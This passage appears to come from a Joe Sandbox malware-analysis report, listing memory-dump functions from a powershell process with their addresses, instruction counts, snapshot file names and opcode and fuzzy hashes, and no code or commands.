                                                                                                                                                                        • Opcode Fuzzy Hash: 0af9251057bcb76e91c8818fda029b1a9029d5a21e258aea2a8446b7e7f0ef2c
                                                                                                                                                                        • Instruction Fuzzy Hash: 0521B375604240AFDB05EF14D9C4B26BBA5FB84714F24C9AFE84B4F381C336E846CAA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD977F Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b23a6db58373fc8d2ad8e94494a6fa6a4af9370de4bf5ca15979c9bfc1a88f35
                                                                                                                                                                        • Instruction ID: 98f2df8676e6593e22a516d2cf4b7e4fa8c1e7331d6fe89091cb0eb3778f76a2
                                                                                                                                                                        • Opcode Fuzzy Hash: b23a6db58373fc8d2ad8e94494a6fa6a4af9370de4bf5ca15979c9bfc1a88f35
                                                                                                                                                                        • Instruction Fuzzy Hash: 0611D6357251008FD705AB69D892B6A7BE7E7C9754B2480A7F00ACB385DF349C428FD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD9F07 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 63c17d5e26af39f0cdb9f42317243d523faca08c84f123d9d2e8304cc0fa6081
                                                                                                                                                                        • Instruction ID: 7d7ee710189fb0717df3d10b0d5f93494b5aa2ef415edbae022a75842781ebdb
                                                                                                                                                                        • Opcode Fuzzy Hash: 63c17d5e26af39f0cdb9f42317243d523faca08c84f123d9d2e8304cc0fa6081
                                                                                                                                                                        • Instruction Fuzzy Hash: 8A1190393151048BD750EB69F851B667BEAEBC6320F248172E115C7798EF70AC46CBD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD978C Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 4f345d7f87e77b92d5507ddea170be9c1b2e7f4cbbe81d1fe2c484e1cd971334
                                                                                                                                                                        • Instruction ID: 22fbee8e24a73122b60cdabbf9e7e510bbe47ff52a5d53a31f9dd1cb5551e8a0
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f345d7f87e77b92d5507ddea170be9c1b2e7f4cbbe81d1fe2c484e1cd971334
                                                                                                                                                                        • Instruction Fuzzy Hash: E411BF397251008BD705ABA9E882B6A7BE7E7C9754F248066E00A9B385DF349C428FD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00AED006 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522635799.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_aed000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 33ef2f7d2ced2074b554dc60738cf1daefe86617af99566afae56e757c5c11c1
                                                                                                                                                                        • Instruction ID: 2878450513db196fba089bc15b2db44fddb8404eaa8a386f7e9db579ad1182aa
                                                                                                                                                                        • Opcode Fuzzy Hash: 33ef2f7d2ced2074b554dc60738cf1daefe86617af99566afae56e757c5c11c1
                                                                                                                                                                        • Instruction Fuzzy Hash: 0921BE750093C08FCB13CF20D994B16BF71EB86314F2985EAD8458B657C33AD80ACBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD3217 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: fea8b7bd6171939f639ef118cf4bc94718ed4f21d1da91303d401c86de1a1415
                                                                                                                                                                        • Instruction ID: 1c59acdad07b126c6dbf601f327687cb2fb70b910cd19e6e11e5fc840534b3c6
                                                                                                                                                                        • Opcode Fuzzy Hash: fea8b7bd6171939f639ef118cf4bc94718ed4f21d1da91303d401c86de1a1415
                                                                                                                                                                        • Instruction Fuzzy Hash: 2011D372B001044FCB14EB69C5059AEB7F6EF81710B108A7AE416EB355EF70DD04CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD4B01 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: fac86eb796402d6aca37a5acdeb25090594753c8facf1ec890d9f841864591a2
                                                                                                                                                                        • Instruction ID: c2f168a077cd5b20a2ecc42f2d8b75244ce9d8e7913742960e43e39c2ceb136a
                                                                                                                                                                        • Opcode Fuzzy Hash: fac86eb796402d6aca37a5acdeb25090594753c8facf1ec890d9f841864591a2
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D214CB19143898FCB20CFA9C48979EFFF4EF59310F14849EC4A5A7241D6746944CFA6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD81F8 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f86b3c4058133cdd824ba4fe22e7ccdeddab87a4a5d69bb0625d67e97b2b6356
                                                                                                                                                                        • Instruction ID: 40ff0f884a5bd6a4d4b7741628595ac5f24a8139f4570b9981165f2538881cc1
                                                                                                                                                                        • Opcode Fuzzy Hash: f86b3c4058133cdd824ba4fe22e7ccdeddab87a4a5d69bb0625d67e97b2b6356
                                                                                                                                                                        • Instruction Fuzzy Hash: D81170387101048FE390EE69E841F2A7BEBEBC9351F248076E41687358EE319C868BC5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00ADEADF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522536874.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_add000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 5685fefa4ee33127fe66c3b1dc816ddd428d29d76058f44a054ce96e449e4c49
                                                                                                                                                                        • Instruction ID: 8879402e1447e8a6087c7a3df76cdaaf0669c013272fffd7d80de120979f92ed
                                                                                                                                                                        • Opcode Fuzzy Hash: 5685fefa4ee33127fe66c3b1dc816ddd428d29d76058f44a054ce96e449e4c49
                                                                                                                                                                        • Instruction Fuzzy Hash: DC117975504280DFDB11DF14D9C4B15BFB2FB84324F24C6AAD84A4B796C33AE84ACBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD81F0 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 3baa6a6e427b2595457fb1d4fcd5acc6c615bf89d05f73a0e444a14e7fcaa194
                                                                                                                                                                        • Instruction ID: 1817ceb99b3d814be00c4e3fbfa00bab644a081743c2e0a9949606ca899d2e09
                                                                                                                                                                        • Opcode Fuzzy Hash: 3baa6a6e427b2595457fb1d4fcd5acc6c615bf89d05f73a0e444a14e7fcaa194
                                                                                                                                                                        • Instruction Fuzzy Hash: 82118238704000CFE380EE68E891B3A77E7EBC8351F248176E01687398EE309C86DB84
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD8200 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 713b2bd4c4e3817f8fc883ad89559aac25df269359a37d1051ec0e60a60d2ab9
                                                                                                                                                                        • Instruction ID: a0af4759f4323058bdb75ecc22691083c0fecf4b9538c0ed5c2ccad7c9ea9784
                                                                                                                                                                        • Opcode Fuzzy Hash: 713b2bd4c4e3817f8fc883ad89559aac25df269359a37d1051ec0e60a60d2ab9
                                                                                                                                                                        • Instruction Fuzzy Hash: 1F116138710104CFE394EE69E855B2A7BE7EBC9351F248076E51687398EE319C86CBC4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD4B24 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c3ddaadc52c82fd303f11d92973290ed914e7285458beaac573e067078d37dc2
                                                                                                                                                                        • Instruction ID: edf9ce666930446d0105d7112c0807ba1faacc29ee2b133c71d3acf6a930ec9b
                                                                                                                                                                        • Opcode Fuzzy Hash: c3ddaadc52c82fd303f11d92973290ed914e7285458beaac573e067078d37dc2
                                                                                                                                                                        • Instruction Fuzzy Hash: B011F8B59102498FCB20DF99C589BDEFFF4EB88310F20845AD559A7340D774A944CFA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD9F18 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 96be6d134ae7e8b526f54d311383fddc6545703acd7121a498ad5613185ecb5f
                                                                                                                                                                        • Instruction ID: f0f9c10cfbdf23175db26789f9d42dbf6245b025423b216ca05d842fd97b39ee
                                                                                                                                                                        • Opcode Fuzzy Hash: 96be6d134ae7e8b526f54d311383fddc6545703acd7121a498ad5613185ecb5f
                                                                                                                                                                        • Instruction Fuzzy Hash: 8B113939310104CBD794EB69E841B6A77E6EBC6310F249076E016C7398EF70AC42CB81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD3018 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 231d2c1f76b105ecf23b7d95a256c6b1820fe0a7196084518029c07833b45ad5
                                                                                                                                                                        • Instruction ID: b330aa35928d13e7fb4d1ac9c5a099d39054c7fdad7ae491779044f0aaf60e7f
                                                                                                                                                                        • Opcode Fuzzy Hash: 231d2c1f76b105ecf23b7d95a256c6b1820fe0a7196084518029c07833b45ad5
                                                                                                                                                                        • Instruction Fuzzy Hash: 1801D432604205AFDB05DF65D814C6EBBE6EFD5314704C0BBE409DB261EA319D058B60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD6AA8 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 14dbf12af0e035f3c6d888d9c25df32773a3f4133f7a0d54f4dc4e38479b96f0
                                                                                                                                                                        • Instruction ID: 1c4790fe6ed9446d030ec43c18145af05c8c45f6729d3fe0a0b83fb75ab79f2c
                                                                                                                                                                        • Opcode Fuzzy Hash: 14dbf12af0e035f3c6d888d9c25df32773a3f4133f7a0d54f4dc4e38479b96f0
                                                                                                                                                                        • Instruction Fuzzy Hash: A511C871D0070A8ECB10EFA9C8419DEFBF4EF59310B51966AD558B7211E730EA81CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD6048 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 36403f3d3538c3ce4940d0a2711abb10adcb480c61916b535a511ef51cff2ed0
                                                                                                                                                                        • Instruction ID: ddb14de13c962c37b0525a9508af9f2c67480370022568542a1a346fa72a71c6
                                                                                                                                                                        • Opcode Fuzzy Hash: 36403f3d3538c3ce4940d0a2711abb10adcb480c61916b535a511ef51cff2ed0
                                                                                                                                                                        • Instruction Fuzzy Hash: AC11E3B5D002488FCB20DFA9C588B9EFBF4FB88310F25885AD859A7350D774A944CFA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00ADD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522536874.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_add000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 09695d1ffd2ee7fb8c34d613f5b65532004e6ec5e9be02fc265cf4d73bcba9bb
                                                                                                                                                                        • Instruction ID: 774dfb0437029f46dd9f55e78cb2850d6c2f2d3faa120b44255dff49932c1d02
                                                                                                                                                                        • Opcode Fuzzy Hash: 09695d1ffd2ee7fb8c34d613f5b65532004e6ec5e9be02fc265cf4d73bcba9bb
                                                                                                                                                                        • Instruction Fuzzy Hash: BA01A731504340AFD7204B29CD88B67BFE8EF85764F18C51BED571B382C2799945CAB5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00ADD005 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522536874.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_add000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: abed3fda303441a04bf2b3ea92a737717065a672a19bcf38de8ade9def25f94a
                                                                                                                                                                        • Instruction ID: 3de030baa92733a36b80c9bad10fd0dbe5f150599624dbe4beda204cddf23729
                                                                                                                                                                        • Opcode Fuzzy Hash: abed3fda303441a04bf2b3ea92a737717065a672a19bcf38de8ade9def25f94a
                                                                                                                                                                        • Instruction Fuzzy Hash: F501527100D3C09FD7128B258C95B52BFB4EF93624F18C1DBD8999F293C2695849C772
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD95C1 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f5618921aa55d218e1bef5a0aabcca1367451ee566b683985beb49202e6b879a
                                                                                                                                                                        • Instruction ID: b9d0140ef1f455a50a1fc0ca02ca826ceb55056fb4d727eb53a703c2abfcc4fa
                                                                                                                                                                        • Opcode Fuzzy Hash: f5618921aa55d218e1bef5a0aabcca1367451ee566b683985beb49202e6b879a
                                                                                                                                                                        • Instruction Fuzzy Hash: 98019075A00219DBDB04DF98E584A9DFBF2FB88314F258066E80AAB345D734ED85CB80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD95CA Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d9ccf4600d016145ed26edc65612690ca087240493b14dc33eb99c561da40d83
                                                                                                                                                                        • Instruction ID: 6c662c408d44e01a79ea118a6855baad0b78042e065c85c68b4d18f832787c02
                                                                                                                                                                        • Opcode Fuzzy Hash: d9ccf4600d016145ed26edc65612690ca087240493b14dc33eb99c561da40d83
                                                                                                                                                                        • Instruction Fuzzy Hash: DC01A235A002189BDB04CFD8E58499DBBF2FB88314F258066E80AEB345D734ED81CB80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD3017 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 961afc4a80343e69c2d7159dc714555375831ac87b3be86ecd4e8502d3baa04e
                                                                                                                                                                        • Instruction ID: 98df08533f6336d1cf0418955bb738909ab01987c34e80cb39ddf4e5b4c54e5f
                                                                                                                                                                        • Opcode Fuzzy Hash: 961afc4a80343e69c2d7159dc714555375831ac87b3be86ecd4e8502d3baa04e
                                                                                                                                                                        • Instruction Fuzzy Hash: 8EF03072A00009AF9B04DF59D841DAEB7FAEFD4314714C1BBE508DB225EA319901CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDA030 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e7652b151922bd87aa4a41cd4d79e9a19a620535177323e7c5999f31c06cd071
                                                                                                                                                                        • Instruction ID: 91caf4f0d409e044c0b145c3c79bd8466edbb360fcd4b9138f379a2d4cf49ef2
                                                                                                                                                                        • Opcode Fuzzy Hash: e7652b151922bd87aa4a41cd4d79e9a19a620535177323e7c5999f31c06cd071
                                                                                                                                                                        • Instruction Fuzzy Hash: 1FD05E3054A6809FD723C6A18D92895BF21DE4B24436481DBE48ACB253D126A90BC6A2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD31B0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2d5d8365d7aeb2af48af315fc8cc7b8500fa86804bf14000d64216c3a78a4162
                                                                                                                                                                        • Instruction ID: 796c6c1c5d706cc8ce62194963452ec39c0aa3e85399bbaa0884d92c2937e03b
                                                                                                                                                                        • Opcode Fuzzy Hash: 2d5d8365d7aeb2af48af315fc8cc7b8500fa86804bf14000d64216c3a78a4162
                                                                                                                                                                        • Instruction Fuzzy Hash: EBE09274A01148EFCB00EFA4E542AAD7BBAEB84301F1084A9E50957350DE325F01CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD31AF Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b5d30f27e53a8f5b9db9df843dc786eb933ac784185fd831b5f50b191fca65af
                                                                                                                                                                        • Instruction ID: 91dba4c95df919cdcaec91c1285f458db25a2064a9402874882899449d6ece55
                                                                                                                                                                        • Opcode Fuzzy Hash: b5d30f27e53a8f5b9db9df843dc786eb933ac784185fd831b5f50b191fca65af
                                                                                                                                                                        • Instruction Fuzzy Hash: 42E09274A01048EFDB00DFA4E542AAC7BB6FB84301F10C5A9E50A97350DE325F01CB51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD6A3F Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 5d5733f190f7f29e207647969b4a6c363202fe8a8609568b27d72782b14f0faa
                                                                                                                                                                        • Instruction ID: 821b1ce6aabd1902b69642e133b4073cc133c61f0354116c45736eb80c1dd51c
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d5733f190f7f29e207647969b4a6c363202fe8a8609568b27d72782b14f0faa
                                                                                                                                                                        • Instruction Fuzzy Hash: B2D05E327000142BD728969EA851EBEA7AACBD8711B08802FF505D7240CD604C0287A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD9340 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
